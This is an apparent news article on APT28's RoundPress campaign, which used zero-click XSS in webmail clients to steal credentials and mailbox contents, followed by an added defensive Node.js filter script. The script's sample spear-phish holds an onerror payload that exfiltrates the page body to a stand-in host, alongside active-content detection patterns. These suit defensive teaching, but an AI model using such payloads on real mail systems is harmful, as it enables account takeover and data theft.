Russian state-backed hackers used silent, email-based exploits to breach global government inboxes in a stealthy campaign now linked to APT28.
A newly uncovered cyberespionage operation called RoundPress has been attributed to the Russian state-sponsored hacking group APT28, also known as Fancy Bear. According to cybersecurity firm ESET, the campaign began in 2023 and extended through 2024, exploiting vulnerabilities in widely used webmail platforms to infiltrate the inboxes of government agencies and defense organizations across the globe.
Using both zero-day and known cross-site scripting (XSS) flaws, the hackers targeted platforms such as Roundcube, Horde, MDaemon, and Zimbra. Victims included government entities in Greece, Ukraine, Serbia, and Cameroon, along with military and critical infrastructure targets in Europe and South America.
The attack method was deceptively simple: victims received spear-phishing emails referencing current events. The HTML body of each message carried JavaScript that ran as soon as the vulnerable webmail client rendered it, with no click or download required. Because the XSS flaw let that script execute inside the victim's authenticated webmail session, it could read and act on the mailbox as the user.
The payload harvested login details by triggering the browser's autofill, then scraped the contents of the victim's inbox and account settings. Stolen data, including two-factor authentication settings and password histories, was quietly exfiltrated to hardcoded command-and-control (C2) servers. Each variant of the script was tailored to the specific webmail product in use.
Vulnerabilities exploited included:
Though ESET has seen no confirmed RoundPress incidents in 2025, it warns that the technique remains viable because new XSS flaws in common webmail tools continue to be discovered.
ESET researchers stated that the campaign could continue with minimal adjustments, noting: “As long as email remains a reliable attack vector and webmail clients contain exploitable flaws, campaigns like RoundPress are likely to persist.”
The group behind the campaign, APT28, is already sanctioned by the U.S. and European governments for past cyberespionage efforts, including interference in democratic elections and NATO-related targeting.
RoundPress illustrates a growing class of risk: attacks that require no user interaction beyond opening an email. As organizations move their communications into the browser, silent, automated credential theft of this kind becomes a more serious threat. Governments and infrastructure providers remain top targets for state-sponsored actors, particularly in times of geopolitical tension.
The campaign underscores the need for timely patching, zero-trust access models, and the retirement of legacy webmail platforms that are vulnerable to XSS.
APT28, also known as Fancy Bear, is a Russian military-linked hacking group known for high-profile cyberespionage campaigns, including election interference and attacks on NATO entities.
Webmail platforms often contain unpatched vulnerabilities and are widely used in government and enterprise settings, making them attractive entry points for attackers seeking sensitive data.
Spear-phishing emails can bypass user suspicion when tailored with current events, and in cases like RoundPress, no interaction beyond opening the email is needed to trigger the exploit.
Cross-site scripting (XSS) flaws let attackers inject script into a trusted web application. In RoundPress the script arrived in the body of an email and ran in the victim's webmail session when the client rendered the message, which gave it access to the mailbox and to credentials.
Steps include retiring outdated webmail software, applying patches promptly, filtering inbound mail so that active content (scripts, inline event handlers, script-scheme links) is stripped before the message reaches the webmail client, and enforcing zero-trust security models across all user endpoints.
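As an added example that is not part of this article or of ESET's report, the Node.js script below models the content-filter step above and the render-time trigger described in the attack section. It contrasts a naive filter that only strips script elements with an indicator scan that also catches inline event handlers and entity-encoded javascript: links, which is the kind of active content a webmail XSS turns into code execution in the victim's session. The sample messages, the c2.invalid host and the indicator list are constructed for illustration; the real RoundPress payloads were specific to each webmail product and are not reproduced here.

```javascript
// Added example, not code from ESET's report or from any webmail project.
// A gateway-side scan of an HTML mail body for active content, the class
// of payload RoundPress delivered. Sample messages, the c2.invalid host
// and the indicator list are constructed for illustration.

// Naive "content filter": drop <script> elements and nothing else.
function stripScriptTags(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "");
}

// Browsers decode character references in attribute values before using
// them, so href="&#106;avascript:..." is a live javascript: URI. Decode
// numeric references and the named ones that matter for URI smuggling.
const NAMED_REFS = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'",
                     colon: ":", tab: "\t", newline: "\n" };
function decodeEntities(s) {
  const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : "\ufffd");
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&([a-z]+);/gi, (m, n) => NAMED_REFS[n.toLowerCase()] ?? m);
}

// Indicators of content that executes or navigates when the message is
// rendered or on a trivial interaction. Deliberately broad: a false
// positive costs a manual review, a miss costs the mailbox.
const ACTIVE_CONTENT = [
  ["script-element",        /<script\b/i],
  ["inline-event-handler",  /<[^>]*\son[a-z]+\s*=/i],
  ["javascript-uri",        /\b(?:href|src|action|formaction|xlink:href)\s*=\s*["']?\s*j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:/i],
  ["data-uri-document",     /\b(?:href|src)\s*=\s*["']?\s*data:(?:text\/html|image\/svg)/i],
  ["embedded-document",     /<(?:iframe|object|embed|svg|math|base)\b/i],
  ["meta-refresh",          /<meta\b[^>]*http-equiv\s*=\s*["']?\s*refresh/i],
  ["css-url-or-expression", /style\s*=\s*["'][^"']*(?:url\s*\(|expression\s*\()/i],
];

// Scan both the raw body and its entity-decoded form.
function findActiveContent(html) {
  const decoded = decodeEntities(html);
  return ACTIVE_CONTENT
    .filter(([, re]) => re.test(html) || re.test(decoded))
    .map(([name]) => name);
}

// Quarantine decision for a filter sitting in front of the webmail host.
function classify(html) {
  const indicators = findActiveContent(html);
  return { verdict: indicators.length ? "quarantine" : "deliver", indicators };
}

// Constructed messages. "spearphish" mirrors the RoundPress pattern: lure
// text about current events plus a payload that fires on render, here an
// onerror handler on an image that never loads. "nested" shows why a
// single-pass regex strip is not a filter.
const SAMPLES = {
  benign: `<p>Team,</p><p>Thursday agenda: <a href="https://example.org/agenda">link</a>.</p>`,
  spearphish: `<p>Breaking: joint statement from the summit.</p>` +
    `<img src="x" onerror="new Image().src='https://c2.invalid/?d='+encodeURIComponent(document.body.innerHTML)">`,
  obfuscated: `<p>Read the <a href="&#106;avascript:void(0)">full report</a>.</p>`,
  nested: `<scr<script></script>ipt>alert(1)</script>`,
};

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, classify(html));
  console.log("  after naive filter:", stripScriptTags(html));
}
```

Run it with `node`. The benign message is delivered; the spear-phish passes the naive filter untouched yet is quarantined on the event handler; the entity-encoded link is invisible to the raw regex and caught only after decoding; and the nested sample comes out of the naive filter as a working script element. A production filter should go further than this (parse the HTML rather than regex it, and reject rather than repair), but the scan shows the three failure modes a practitioner has to cover.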